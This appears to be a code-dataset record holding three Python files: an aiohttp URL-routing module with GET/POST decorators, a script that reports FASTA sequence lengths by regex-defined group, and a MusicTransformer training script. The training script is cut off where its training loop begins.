2019-02-18T10:44:20.000Z
|
# ====== 🙋🙋🙋 Implements mapping one function fn to one URL handler function!!!
import asyncio, os, inspect, logging, functools
from urllib import parse
from aiohttp import web
from apis import APIError
def get(path):
'''
Define decorator @get('/path')
'''
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
return func(*args, **kw)
wrapper.__method__ = 'GET'
wrapper.__route__ = path
return wrapper
return decorator
def post(path):
'''
Define decorator @post('/path')
'''
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
return func(*args, **kw)
wrapper.__method__ = 'POST'
wrapper.__route__ = path
return wrapper
return decorator
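# Editor's sketch (hypothetical handler, not part of the original module):
# @get/@post only tag the wrapped function with __method__/__route__;
# add_route reads those tags later. Note add_routes skips names starting
# with '_', so this demo handler is never registered.
@get('/hello')
def _hello_demo(request):
    return '<h1>hello</h1>'
# _hello_demo.__method__ == 'GET' and _hello_demo.__route__ == '/hello'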
def get_required_kw_args(fn):
args = []
params = inspect.signature(fn).parameters
for name, param in params.items():
if param.kind == inspect.Parameter.KEYWORD_ONLY and param.default == inspect.Parameter.empty:
args.append(name)
return tuple(args)
def get_named_kw_args(fn):
args = []
params = inspect.signature(fn).parameters
for name, param in params.items():
if param.kind == inspect.Parameter.KEYWORD_ONLY:
args.append(name)
return tuple(args)
def has_named_kw_args(fn):
params = inspect.signature(fn).parameters
for name, param in params.items():
if param.kind == inspect.Parameter.KEYWORD_ONLY:
return True
def has_var_kw_arg(fn):
params = inspect.signature(fn).parameters
for name, param in params.items():
if param.kind == inspect.Parameter.VAR_KEYWORD:
return True
def has_request_arg(fn):
sig = inspect.signature(fn)
params = sig.parameters
found = False
for name, param in params.items():
if name == 'request':
found = True
continue
if found and (param.kind != inspect.Parameter.VAR_POSITIONAL and param.kind != inspect.Parameter.KEYWORD_ONLY and param.kind != inspect.Parameter.VAR_KEYWORD):
raise ValueError('request parameter must be the last named parameter in function: %s%s' % (fn.__name__, str(sig)))
return found
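# Editor's sketch: how the inspect-based helpers above classify a
# hypothetical handler signature.
def _sig_demo(request, *, page='1', size):
    pass
# get_required_kw_args(_sig_demo) -> ('size',)         keyword-only, no default
# get_named_kw_args(_sig_demo)    -> ('page', 'size')  all keyword-only args
# has_request_arg(_sig_demo)      -> True              'request' comes first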
class RequestHandler(object):
def __init__(self, app, fn):
self._app = app
self._func = fn
self._has_request_arg = has_request_arg(fn)
self._has_var_kw_arg = has_var_kw_arg(fn)
self._has_named_kw_args = has_named_kw_args(fn)
self._named_kw_args = get_named_kw_args(fn)
self._required_kw_args = get_required_kw_args(fn)
@asyncio.coroutine
def __call__(self, request):
kw = None
if self._has_var_kw_arg or self._has_named_kw_args or self._required_kw_args:
if request.method == 'POST':
if not request.content_type:
return web.HTTPBadRequest('Missing Content-Type.')
ct = request.content_type.lower()
if ct.startswith('application/json'):
params = yield from request.json()
if not isinstance(params, dict):
return web.HTTPBadRequest('JSON body must be object.')
kw = params
elif ct.startswith('application/x-www-form-urlencoded') or ct.startswith('multipart/form-data'):
params = yield from request.post()
kw = dict(**params)
else:
return web.HTTPBadRequest('Unsupported Content-Type: %s' % request.content_type)
if request.method == 'GET':
qs = request.query_string
if qs:
kw = dict()
for k, v in parse.parse_qs(qs, True).items():
kw[k] = v[0]
if kw is None:
kw = dict(**request.match_info)
else:
if not self._has_var_kw_arg and self._named_kw_args:
# remove all unnamed kw:
copy = dict()
for name in self._named_kw_args:
if name in kw:
copy[name] = kw[name]
kw = copy
# check named arg:
for k, v in request.match_info.items():
if k in kw:
logging.warning('Duplicate arg name in named arg and kw args: %s' % k)
kw[k] = v
if self._has_request_arg:
kw['request'] = request
# check required kw:
if self._required_kw_args:
for name in self._required_kw_args:
if not name in kw:
return web.HTTPBadRequest('Missing argument: %s' % name)
logging.info('call with args: %s' % str(kw))
try:
r = yield from self._func(**kw)
return r
except APIError as e:
return dict(error=e.error, data=e.data, message=e.message)
def add_static(app):
path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'static')
app.router.add_static('/static/', path)
logging.info('add static %s => %s' % ('/static/', path))
def add_route(app, fn):
method = getattr(fn, '__method__', None)
path = getattr(fn, '__route__', None)
if path is None or method is None:
raise ValueError('@get or @post not defined in %s.' % str(fn))
if not asyncio.iscoroutinefunction(fn) and not inspect.isgeneratorfunction(fn):
fn = asyncio.coroutine(fn)
logging.info('add route %s %s => %s(%s)' % (method, path, fn.__name__, ', '.join(inspect.signature(fn).parameters.keys())))
app.router.add_route(method, path, RequestHandler(app, fn))
def add_routes(app, module_name):
n = module_name.rfind('.')
if n == (-1):
mod = __import__(module_name, globals(), locals())
else:
name = module_name[n+1:]
mod = getattr(__import__(module_name[:n], globals(), locals(), [name]), name)
for attr in dir(mod):
if attr.startswith('_'):
continue
fn = getattr(mod, attr)
if callable(fn):
method = getattr(fn, '__method__', None)
path = getattr(fn, '__route__', None)
if method and path:
add_route(app, fn)
| 36.567251
| 167
| 0.581481
|
import asyncio, os, inspect, logging, functools
from urllib import parse
from aiohttp import web
from apis import APIError
def get(path):
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
return func(*args, **kw)
wrapper.__method__ = 'GET'
wrapper.__route__ = path
return wrapper
return decorator
def post(path):
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
return func(*args, **kw)
wrapper.__method__ = 'POST'
wrapper.__route__ = path
return wrapper
return decorator
def get_required_kw_args(fn):
args = []
params = inspect.signature(fn).parameters
for name, param in params.items():
if param.kind == inspect.Parameter.KEYWORD_ONLY and param.default == inspect.Parameter.empty:
args.append(name)
return tuple(args)
def get_named_kw_args(fn):
args = []
params = inspect.signature(fn).parameters
for name, param in params.items():
if param.kind == inspect.Parameter.KEYWORD_ONLY:
args.append(name)
return tuple(args)
def has_named_kw_args(fn):
params = inspect.signature(fn).parameters
for name, param in params.items():
if param.kind == inspect.Parameter.KEYWORD_ONLY:
return True
def has_var_kw_arg(fn):
params = inspect.signature(fn).parameters
for name, param in params.items():
if param.kind == inspect.Parameter.VAR_KEYWORD:
return True
def has_request_arg(fn):
sig = inspect.signature(fn)
params = sig.parameters
found = False
for name, param in params.items():
if name == 'request':
found = True
continue
if found and (param.kind != inspect.Parameter.VAR_POSITIONAL and param.kind != inspect.Parameter.KEYWORD_ONLY and param.kind != inspect.Parameter.VAR_KEYWORD):
raise ValueError('request parameter must be the last named parameter in function: %s%s' % (fn.__name__, str(sig)))
return found
class RequestHandler(object):
def __init__(self, app, fn):
self._app = app
self._func = fn
self._has_request_arg = has_request_arg(fn)
self._has_var_kw_arg = has_var_kw_arg(fn)
self._has_named_kw_args = has_named_kw_args(fn)
self._named_kw_args = get_named_kw_args(fn)
self._required_kw_args = get_required_kw_args(fn)
@asyncio.coroutine
def __call__(self, request):
kw = None
if self._has_var_kw_arg or self._has_named_kw_args or self._required_kw_args:
if request.method == 'POST':
if not request.content_type:
return web.HTTPBadRequest('Missing Content-Type.')
ct = request.content_type.lower()
if ct.startswith('application/json'):
params = yield from request.json()
if not isinstance(params, dict):
return web.HTTPBadRequest('JSON body must be object.')
kw = params
elif ct.startswith('application/x-www-form-urlencoded') or ct.startswith('multipart/form-data'):
params = yield from request.post()
kw = dict(**params)
else:
return web.HTTPBadRequest('Unsupported Content-Type: %s' % request.content_type)
if request.method == 'GET':
qs = request.query_string
if qs:
kw = dict()
for k, v in parse.parse_qs(qs, True).items():
kw[k] = v[0]
if kw is None:
kw = dict(**request.match_info)
else:
if not self._has_var_kw_arg and self._named_kw_args:
copy = dict()
for name in self._named_kw_args:
if name in kw:
copy[name] = kw[name]
kw = copy
for k, v in request.match_info.items():
if k in kw:
logging.warning('Duplicate arg name in named arg and kw args: %s' % k)
kw[k] = v
if self._has_request_arg:
kw['request'] = request
if self._required_kw_args:
for name in self._required_kw_args:
if not name in kw:
return web.HTTPBadRequest('Missing argument: %s' % name)
logging.info('call with args: %s' % str(kw))
try:
r = yield from self._func(**kw)
return r
except APIError as e:
return dict(error=e.error, data=e.data, message=e.message)
def add_static(app):
path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'static')
app.router.add_static('/static/', path)
logging.info('add static %s => %s' % ('/static/', path))
def add_route(app, fn):
method = getattr(fn, '__method__', None)
path = getattr(fn, '__route__', None)
if path is None or method is None:
raise ValueError('@get or @post not defined in %s.' % str(fn))
if not asyncio.iscoroutinefunction(fn) and not inspect.isgeneratorfunction(fn):
fn = asyncio.coroutine(fn)
logging.info('add route %s %s => %s(%s)' % (method, path, fn.__name__, ', '.join(inspect.signature(fn).parameters.keys())))
app.router.add_route(method, path, RequestHandler(app, fn))
def add_routes(app, module_name):
n = module_name.rfind('.')
if n == (-1):
mod = __import__(module_name, globals(), locals())
else:
name = module_name[n+1:]
mod = getattr(__import__(module_name[:n], globals(), locals(), [name]), name)
for attr in dir(mod):
if attr.startswith('_'):
continue
fn = getattr(mod, attr)
if callable(fn):
method = getattr(fn, '__method__', None)
path = getattr(fn, '__route__', None)
if method and path:
add_route(app, fn)
| true
| true
|
790dc7a15f3e10652fa91d703d5d33b46dee027c
| 3,734
|
py
|
Python
|
python/fasta/seqlength.py
|
lotharwissler/bioinformatics
|
83a53771222ecb0759e3b4bfa2018d2cd7647643
|
[
"MIT"
] | 10
|
2016-01-13T00:39:30.000Z
|
2020-11-30T05:56:19.000Z
|
python/fasta/seqlength.py
|
lotharwissler/bioinformatics
|
83a53771222ecb0759e3b4bfa2018d2cd7647643
|
[
"MIT"
] | 1
|
2017-02-09T22:46:49.000Z
|
2017-02-09T22:46:49.000Z
|
python/fasta/seqlength.py
|
lotharwissler/bioinformatics
|
83a53771222ecb0759e3b4bfa2018d2cd7647643
|
[
"MIT"
] | 10
|
2015-10-09T00:29:16.000Z
|
2019-06-09T05:32:15.000Z
|
#!/usr/bin/python
import os, sys # low level handling, such as command line stuff
import string # string methods available
import re # regular expressions
import getopt # comand line argument handling
import math # match functions
from low import * # custom functions, written by myself
# =============================================================================
def show_help( ):
""" displays the program parameter list and usage information """
stdout( "usage: " + sys.argv[0] + " -f <path>" )
stdout( " " )
stdout( " option description" )
stdout( " -h help (this text here)" )
stdout( " -f fasta file to import" )
stdout( " -g map file, tab delimited, regex to name (one per line) to group sequences into distinct bins" )
stdout( " " )
sys.exit(1)
# =============================================================================
def handle_arguments():
""" verifies the presence of all necessary arguments and returns the data dir """
if len ( sys.argv ) == 1:
stderr( "no arguments provided." )
show_help()
try: # check for the right arguments
keys, values = getopt.getopt( sys.argv[1:], "hf:g:" )
except getopt.GetoptError:
stderr( "invalid arguments provided." )
show_help()
args = {}
for key, value in keys:
if key == '-f': args['file'] = value
if key == '-g': args['group'] = value
if not args.has_key('file'):
stderr( "import file argument missing." )
show_help()
elif not file_exists( args.get('file') ):
stderr( "import file does not exist." )
show_help()
return args
# =============================================================================
def read_groups( file ):
groups = {}
fo = open( file )
for line in fo:
line = line.rstrip()
regex, name = line.split("\t")
groups[name] = re.compile(regex)
fo.close()
return groups
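# Editor's note: read_groups expects one tab-delimited "regex<TAB>name" pair
# per line; a hypothetical map file
#   ^gi\|<TAB>ncbi
#   _HUMAN$<TAB>human
# yields {'ncbi': <compiled ^gi\|>, 'human': <compiled _HUMAN$>}, and sequence
# IDs are then binned by the first regex that matches (see read_sequences).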
# =============================================================================
def read_sequences( file, groups ):
def add_entry( hash, groups, id, seq ):
group = "*all*"
for name, regex in groups.iteritems():
if re.search(regex, id):
group = name
break
if hash[group].has_key(id): sys.stderr.write("WARNING: overwriting entry with the same ID (%s) in group %s...\n" %(id, group))
hash[group][id] = seq
return hash
hash = {}
for name, regex in groups.iteritems(): hash[name] = {}
if hash.has_key('*all*'): sys.stderr.write("WARNING: you used \"*all*\" as a group name. This name refers to all non-group-matching entries as well!\n")
hash['*all*'] = {}
id, seq = "", ""
fo = open( file )
for line in fo:
line = line.rstrip()
if line.startswith(">"):
if id != "": add_entry( hash, groups, id, seq )
id = line[1:]
seq = ""
else:
seq += line
if id != "": add_entry( hash, groups, id, seq )
fo.close()
return hash
# =============================================================================
def eval_seq_lengths(hash):
for group, seqhash in hash.iteritems():
for id, seq in seqhash.iteritems():
print string.join([group, id, str(len(seq))], "\t")
# =============================================================================
# === MAIN ====================================================================
# =============================================================================
def main( args ):
groups = {}
if args.has_key('group'): groups = read_groups( args.get('group') )
seqhash = read_sequences( args.get('file'), groups )
eval_seq_lengths(seqhash)
# =============================================================================
args = handle_arguments()
main( args )
| 33.044248
| 154
| 0.497054
|
import os, sys
import string
import re
import getopt
import math
from low import *
def show_help( ):
""" displays the program parameter list and usage information """
stdout( "usage: " + sys.argv[0] + " -f <path>" )
stdout( " " )
stdout( " option description" )
stdout( " -h help (this text here)" )
stdout( " -f fasta file to import" )
stdout( " -g map file, tab delimited, regex to name (one per line) to group sequences into distinct bins" )
stdout( " " )
sys.exit(1)
def handle_arguments():
""" verifies the presence of all necessary arguments and returns the data dir """
if len ( sys.argv ) == 1:
stderr( "no arguments provided." )
show_help()
try:
keys, values = getopt.getopt( sys.argv[1:], "hf:g:" )
except getopt.GetoptError:
stderr( "invalid arguments provided." )
show_help()
args = {}
for key, value in keys:
if key == '-f': args['file'] = value
if key == '-g': args['group'] = value
if not args.has_key('file'):
stderr( "import file argument missing." )
show_help()
elif not file_exists( args.get('file') ):
stderr( "import file does not exist." )
show_help()
return args
def read_groups( file ):
groups = {}
fo = open( file )
for line in fo:
line = line.rstrip()
regex, name = line.split("\t")
groups[name] = re.compile(regex)
fo.close()
return groups
def read_sequences( file, groups ):
def add_entry( hash, groups, id, seq ):
group = "*all*"
for name, regex in groups.iteritems():
if re.search(regex, id):
group = name
break
if hash[group].has_key(id): sys.stderr.write("WARNING: overwriting entry with the same ID (%s) in group %s...\n" %(id, group))
hash[group][id] = seq
return hash
hash = {}
for name, regex in groups.iteritems(): hash[name] = {}
if hash.has_key('*all*'): sys.stderr.write("WARNING: you used \"*all*\" as a group name. This name refers to all non-group-matching entries as well!\n")
hash['*all*'] = {}
id, seq = "", ""
fo = open( file )
for line in fo:
line = line.rstrip()
if line.startswith(">"):
if id != "": add_entry( hash, groups, id, seq )
id = line[1:]
seq = ""
else:
seq += line
if id != "": add_entry( hash, groups, id, seq )
fo.close()
return hash
def eval_seq_lengths(hash):
for group, seqhash in hash.iteritems():
for id, seq in seqhash.iteritems():
print string.join([group, id, str(len(seq))], "\t")
def main( args ):
groups = {}
if args.has_key('group'): groups = read_groups( args.get('group') )
seqhash = read_sequences( args.get('file'), groups )
eval_seq_lengths(seqhash)
args = handle_arguments()
main( args )
| false
| true
|
790dc821dd259e60fc21fabc45da87128247863e
| 21,528
|
py
|
Python
|
train.py
|
yeong35/MusicTransformer-Pytorch
|
5cd5e1bab8dfa0ed605089d7f41430e6e0596dc8
|
[
"MIT"
] | null | null | null |
train.py
|
yeong35/MusicTransformer-Pytorch
|
5cd5e1bab8dfa0ed605089d7f41430e6e0596dc8
|
[
"MIT"
] | null | null | null |
train.py
|
yeong35/MusicTransformer-Pytorch
|
5cd5e1bab8dfa0ed605089d7f41430e6e0596dc8
|
[
"MIT"
] | null | null | null |
import os
import csv
import shutil
from datetime import datetime
from numpy import logspace
import torch
import torch.nn as nn
from torch.optim.lr_scheduler import LambdaLR
from torch.utils.data import DataLoader
from torch.optim import Adam
from dataset.e_piano import create_epiano_datasets, create_pop909_datasets
from model.music_transformer import MusicTransformer
from model.discriminator import MusicDiscriminator
from model.classifier import CNNDiscriminator
from model.loss import SmoothCrossEntropyLoss
from utilities.constants import *
from utilities.WGAN_GP import WassersteinLoss
from utilities.device import get_device, use_cuda
from utilities.lr_scheduling import LrStepTracker, get_lr
from utilities.argument_funcs import parse_train_args, print_train_args, write_model_params
from utilities.run_model import train_epoch, eval_model
CSV_HEADER = ["Epoch", "Learn rate", "Avg Train loss", "Train Accuracy", "Avg Eval loss", "Eval accuracy"]
dis_filter_sizes = [2, 3, 4, 5]
dis_num_filters = [300, 300, 300, 300]
# Baseline is an untrained epoch that we evaluate as a baseline loss and accuracy
BASELINE_EPOCH = -1
# main
def main():
"""
----------
Author: Damon Gwinn
----------
Entry point. Trains a model specified by command line arguments
----------
"""
args = parse_train_args()
print_train_args(args)
if(args.force_cpu):
use_cuda(False)
print("WARNING: Forced CPU usage, expect model to perform slower")
print("")
eventid = f"{datetime.now().strftime('MusicTransformer-%Y.%m.%d')}_gan_{args.gan}_creative_{args.creative}_ce_{args.ce_smoothing}"
args.output_dir = args.output_dir + "/" + eventid
os.makedirs(args.output_dir, exist_ok=True)
##### Output prep #####
params_file = os.path.join(args.output_dir, "model_params.txt")
write_model_params(args, params_file)
weights_folder = os.path.join(args.output_dir, "weights")
os.makedirs(weights_folder, exist_ok=True)
results_folder = os.path.join(args.output_dir, "results")
os.makedirs(results_folder, exist_ok=True)
results_file = os.path.join(results_folder, "results.csv")
best_loss_file = os.path.join(results_folder, "best_loss_weights.pickle")
best_acc_file = os.path.join(results_folder, "best_acc_weights.pickle")
best_loss_critic_file = os.path.join(results_folder, "best_loss_critic_weights.pickle")
best_acc_critic_file = os.path.join(results_folder, "best_acc_critic_weights.pickle")
best_loss_classifier_file = os.path.join(
results_folder, "best_loss_classifier_weights.pickle")
best_acc_classifier_file = os.path.join(
results_folder, "best_acc_classifier_weights.pickle")
best_text = os.path.join(results_folder, "best_epochs.txt")
##### Tensorboard #####
if(args.no_tensorboard):
tensorboard_summary = None
else:
from torch.utils.tensorboard import SummaryWriter
tensorboad_dir = os.path.join(args.output_dir, "tensorboard/" + eventid)
tensorboard_summary = SummaryWriter(log_dir=tensorboad_dir)
##### Datasets #####
    # The dataset paths change with the encoding, so each case has to be handled as below
if args.interval and args.octave:
print("octave interval dataset!!")
classic_train, classic_val, classic_test = create_epiano_datasets('./dataset/octave_interval_e_piano', args.max_sequence,
condition_token=args.condition_token, interval = args.interval, octave = args.octave)
pop909_dataset = create_pop909_datasets('./dataset/logscale_pop909', args.max_sequence, condition_token=args.condition_token, interval = args.interval, octave = args.octave)
pop_train, pop_valid, pop_test = torch.utils.data.random_split(pop909_dataset,
[int(len(pop909_dataset) * 0.8), int(len(pop909_dataset) * 0.1),
len(pop909_dataset) - int(len(pop909_dataset) * 0.8) - int(len(pop909_dataset) * 0.1)],
generator=torch.Generator().manual_seed(42))
elif args.octave and args.fusion_encoding and args.absolute:
print("absolute dataset!!")
classic_train, classic_val, classic_test = create_epiano_datasets('./dataset/octave_fusion_absolute_e_piano', args.max_sequence,
condition_token=args.condition_token, interval = args.interval, octave = args.octave, fusion = args.fusion_encoding, absolute = args.absolute)
pop909_dataset = create_pop909_datasets('./dataset/pop909_absolute', args.max_sequence, condition_token=args.condition_token, interval = args.interval, octave = args.octave, fusion = args.fusion_encoding, absolute = args.absolute)
pop_train, pop_valid, pop_test = torch.utils.data.random_split(pop909_dataset,
[int(len(pop909_dataset) * 0.8), int(len(pop909_dataset) * 0.1),
len(pop909_dataset) - int(len(pop909_dataset) * 0.8) - int(len(pop909_dataset) * 0.1)],
generator=torch.Generator().manual_seed(42))
elif args.interval and not args.octave:
print("interval dataset!!")
classic_train, classic_val, classic_test = create_epiano_datasets('./dataset/logscale_e_piano', args.max_sequence,
condition_token=args.condition_token, interval = args.interval, octave = args.octave)
pop909_dataset = create_pop909_datasets('./dataset/logscale_pop909', args.max_sequence, condition_token=args.condition_token, interval = args.interval, octave = args.octave)
pop_train, pop_valid, pop_test = torch.utils.data.random_split(pop909_dataset,
[int(len(pop909_dataset) * 0.8), int(len(pop909_dataset) * 0.1),
len(pop909_dataset) - int(len(pop909_dataset) * 0.8) - int(len(pop909_dataset) * 0.1)],
generator=torch.Generator().manual_seed(42))
elif args.octave and args.fusion_encoding:
print("Octave_fusion dataset!!")
classic_train, classic_val, classic_test = create_epiano_datasets('./dataset/octave_fusion_e_piano', args.max_sequence,
condition_token=args.condition_token, interval = args.interval, octave = args.octave, fusion = args.fusion_encoding)
pop909_dataset = create_pop909_datasets('./dataset/logscale_pop909', args.max_sequence, condition_token=args.condition_token, interval = args.interval, octave = args.octave, fusion = args.fusion_encoding)
pop_train, pop_valid, pop_test = torch.utils.data.random_split(pop909_dataset,
[int(len(pop909_dataset) * 0.8), int(len(pop909_dataset) * 0.1),
len(pop909_dataset) - int(len(pop909_dataset) * 0.8) - int(len(pop909_dataset) * 0.1)],
generator=torch.Generator().manual_seed(42))
elif not args.interval and args.octave and not args.fusion_encoding:
print("Octave dataset!!")
classic_train, classic_val, classic_test = create_epiano_datasets('./dataset/octave_e_piano', args.max_sequence,
condition_token=args.condition_token, interval = args.interval, octave = args.octave)
pop909_dataset = create_pop909_datasets('./dataset/pop909_octave', args.max_sequence, condition_token=args.condition_token, interval = args.interval, octave = args.octave)
pop_train, pop_valid, pop_test = torch.utils.data.random_split(pop909_dataset,
[int(len(pop909_dataset) * 0.8), int(len(pop909_dataset) * 0.1),
len(pop909_dataset) - int(len(pop909_dataset) * 0.8) - int(len(pop909_dataset) * 0.1)],
generator=torch.Generator().manual_seed(42))
elif args.logscale:
print("logscvale dataset")
classic_train, classic_val, classic_test = create_epiano_datasets('./dataset/logscale_epiano0420', args.max_sequence, random_seq=True,
condition_token=args.condition_token, interval = args.interval, octave = args.octave, logscale=args.logscale, absolute = args.absolute)
pop909_dataset = create_pop909_datasets('./dataset/logscale_pop0420', args.max_sequence, random_seq=True, condition_token=args.condition_token, interval = args.interval, octave = args.octave, logscale=args.logscale, absolute = args.absolute)
pop_train, pop_valid, pop_test = torch.utils.data.random_split(pop909_dataset,
[int(len(pop909_dataset) * 0.8), int(len(pop909_dataset) * 0.1),
len(pop909_dataset) - int(len(pop909_dataset) * 0.8) - int(len(pop909_dataset) * 0.1)],
generator=torch.Generator().manual_seed(42))
else:
classic_train, classic_val, classic_test = create_epiano_datasets(args.classic_input_dir, args.max_sequence,
condition_token = args.condition_token, octave = args.octave)
pop909_dataset = create_pop909_datasets('dataset/pop_pickle/', args.max_sequence, condition_token = args.condition_token, octave = args.octave)
pop_train, pop_valid, pop_test = torch.utils.data.random_split(pop909_dataset,
[int(len(pop909_dataset) * 0.8), int(len(pop909_dataset) * 0.1), len(pop909_dataset) - int(len(pop909_dataset) * 0.8) - int(len(pop909_dataset) * 0.1)],
generator=torch.Generator().manual_seed(42))
if args.data == 'both':
print("Dataset: both")
train_dataset = torch.utils.data.ConcatDataset([ classic_train, pop_train])
val_dataset = torch.utils.data.ConcatDataset([ classic_val, pop_valid])
elif args.data == 'classic':
print("Dataset: classic")
train_dataset = torch.utils.data.ConcatDataset([classic_train])
val_dataset = torch.utils.data.ConcatDataset([classic_val])
else:
print("Dataset: pop")
train_dataset = torch.utils.data.ConcatDataset([pop_train])
val_dataset = torch.utils.data.ConcatDataset([pop_valid])
test_dataset = torch.utils.data.ConcatDataset([classic_test, pop_test])
train_loader = DataLoader(train_dataset, batch_size=args.batch_size, num_workers=args.n_workers, shuffle=True)
val_loader = DataLoader(val_dataset, batch_size=args.batch_size, num_workers=args.n_workers)
test_loader = DataLoader(test_dataset, batch_size=args.batch_size, num_workers=args.n_workers)
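    # Editor's note (worked arithmetic, hypothetical size): every branch above
    # splits pop909_dataset 80/10/10 with the rounding remainder folded into
    # the test share, e.g. for len(pop909_dataset) == 909:
    #   train = int(909 * 0.8)   # 727
    #   valid = int(909 * 0.1)   # 90
    #   test  = 909 - 727 - 90   # 92, absorbs the int() truncation leftovers
    # manual_seed(42) keeps the partition reproducible across runs.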
model = MusicTransformer(n_layers=args.n_layers, num_heads=args.num_heads,
d_model=args.d_model, dim_feedforward=args.dim_feedforward, dropout=args.dropout,
max_sequence=args.max_sequence, rpr=args.rpr,
condition_token = args.condition_token, interval = args.interval, octave = args.octave,
fusion = args.fusion_encoding, absolute = args.absolute, logscale=args.logscale).to(get_device())
# EY critic
# num_prime = args.num_prime
critic = MusicDiscriminator(n_layers=args.n_layers // 2, num_heads=args.num_heads // 2,
d_model=args.d_model // 2, dim_feedforward=args.dim_feedforward // 2, dropout=args.dropout,
max_sequence=args.max_sequence, rpr=args.rpr).to(get_device())
classifier = MusicDiscriminator(n_layers=args.n_layers // 2, num_heads=args.num_heads // 2,
d_model=args.d_model // 2, dim_feedforward=args.dim_feedforward // 2, dropout=args.dropout,
max_sequence=args.max_sequence, rpr=args.rpr).to(get_device())
if args.creative:
classifier.load_state_dict(torch.load('best_classifier_acc_0.9883.pickle'))
##### Continuing from previous training session #####
start_epoch = BASELINE_EPOCH
if(args.continue_weights is not None):
if(args.continue_epoch is None):
print("ERROR: Need epoch number to continue from (-continue_epoch) when using continue_weights")
return
else:
model.load_state_dict(torch.load(args.continue_weights))
start_epoch = args.continue_epoch
elif(args.continue_epoch is not None):
print("ERROR: Need continue weights (-continue_weights) when using continue_epoch")
return
##### Lr Scheduler vs static lr #####
if(args.lr is None):
if(args.continue_epoch is None):
init_step = 0
else:
init_step = args.continue_epoch * len(train_loader)
lr = LR_DEFAULT_START
lr_stepper = LrStepTracker(args.d_model, SCHEDULER_WARMUP_STEPS, init_step)
else:
lr = args.lr
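    # Editor's note (assumption, not verified against utilities/lr_scheduling.py):
    # LrStepTracker presumably implements the warmup schedule from Vaswani et al.
    # (2017), i.e. lr(step) = d_model**-0.5 * min(step**-0.5, step * warmup**-1.5),
    # which grows linearly for SCHEDULER_WARMUP_STEPS steps, then decays ~1/sqrt(step).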
##### Not smoothing evaluation loss #####
if args.interval and args.octave:
eval_loss_func = nn.CrossEntropyLoss(ignore_index=TOKEN_PAD_OCTAVE_INTERVAL)
elif args.interval and not args.octave:
eval_loss_func = nn.CrossEntropyLoss(ignore_index=TOKEN_PAD_INTERVAL)
elif args.octave and args.fusion_encoding and args.absolute:
eval_loss_func = nn.CrossEntropyLoss(ignore_index=TOKEN_PAD_OCTAVE_FUSION_ABSOLUTE)
elif args.octave and args.fusion_encoding:
eval_loss_func = nn.CrossEntropyLoss(ignore_index=TOKEN_PAD_OCTAVE_FUSION)
elif not args.interval and args.octave and not args.fusion_encoding:
eval_loss_func = nn.CrossEntropyLoss(ignore_index=TOKEN_PAD_OCTAVE)
elif args.logscale:
eval_loss_func = nn.CrossEntropyLoss(ignore_index=TOKEN_PAD_RELATIVE)
else:
eval_loss_func = nn.CrossEntropyLoss(ignore_index=TOKEN_PAD)
##### SmoothCrossEntropyLoss or CrossEntropyLoss for training #####
if(args.ce_smoothing is None):
train_loss_func = eval_loss_func
else:
if args.interval and args.octave:
train_loss_func = SmoothCrossEntropyLoss(args.ce_smoothing, VOCAB_SIZE_OCTAVE_INTERVAL, ignore_index=TOKEN_PAD_INTERVAL)
elif args.interval and not args.octave:
train_loss_func = SmoothCrossEntropyLoss(args.ce_smoothing, VOCAB_SIZE_INTERVAL, ignore_index=TOKEN_PAD_INTERVAL)
elif not args.interval and args.octave and args.fusion_encoding and args.absolute:
train_loss_func = SmoothCrossEntropyLoss(args.ce_smoothing, VOCAB_SIZE_OCTAVE_FUSION_ABSOLUTE, ignore_index=TOKEN_PAD_OCTAVE_FUSION_ABSOLUTE)
elif not args.interval and args.octave and args.fusion_encoding:
train_loss_func = SmoothCrossEntropyLoss(args.ce_smoothing, VOCAB_SIZE_OCTAVE_FUSION, ignore_index=TOKEN_PAD_OCTAVE_FUSION)
elif not args.interval and args.octave and not args.fusion_encoding:
train_loss_func = SmoothCrossEntropyLoss(args.ce_smoothing, VOCAB_SIZE_OCTAVE, ignore_index=TOKEN_PAD_OCTAVE)
elif args.logscale:
train_loss_func = SmoothCrossEntropyLoss(args.ce_smoothing, VOCAB_SIZE_RELATIVE, ignore_index=TOKEN_PAD_RELATIVE)
else:
train_loss_func = SmoothCrossEntropyLoss(args.ce_smoothing, VOCAB_SIZE, ignore_index=TOKEN_PAD)
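    # Editor's note (standard label-smoothing formulation; the exact internals
    # live in model/loss.py): with smoothing eps and vocab size V, the one-hot
    # target y is replaced by  y_smooth = (1 - eps) * y + eps / V  before the
    # cross-entropy is taken, discouraging over-confident logits.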
##### EY - WGAN Loss #####
classifier_loss_func = nn.MSELoss()
##### Optimizer #####
opt = Adam(model.parameters(), lr=lr, betas=(ADAM_BETA_1, ADAM_BETA_2), eps=ADAM_EPSILON)
critic_opt = Adam(critic.parameters(), lr=lr, betas=(ADAM_BETA_1, ADAM_BETA_2), eps=ADAM_EPSILON)
classifier_opt = Adam(classifier.parameters(), lr=lr, betas=(ADAM_BETA_1, ADAM_BETA_2), eps=ADAM_EPSILON)
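    # Editor's note (standard WGAN-GP objective; utilities/WGAN_GP.py may differ
    # in details): the critic minimizes
    #   L_D = mean(D(fake)) - mean(D(real)) + lam * mean((grad_norm(x_hat) - 1)**2)
    # while the generator minimizes  L_G = -mean(D(fake)).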
if(args.lr is None):
lr_scheduler = LambdaLR(opt, lr_stepper.step)
critic_lr_scheduler = LambdaLR(critic_opt, lr_stepper.step)
classifier_lr_scheduler = LambdaLR(classifier_opt, lr_stepper.step)
else:
lr_scheduler = None
##### Tracking best evaluation accuracy #####
best_eval_acc = 0.0
best_eval_acc_epoch = -1
best_eval_loss = float("inf")
best_eval_loss_epoch = -1
##### Results reporting #####
if(not os.path.isfile(results_file)):
with open(results_file, "w", newline="") as o_stream:
writer = csv.writer(o_stream)
writer.writerow(CSV_HEADER)
##### TRAIN LOOP #####
for epoch in range(start_epoch, args.epochs):
# Baseline has no training and acts as a base loss and accuracy (epoch 0 in a sense)
if(epoch >= BASELINE_EPOCH):
print(SEPERATOR)
print("NEW EPOCH:", epoch+1)
print(SEPERATOR)
print("")
# Train
            # EY: start of the section that needs fixing
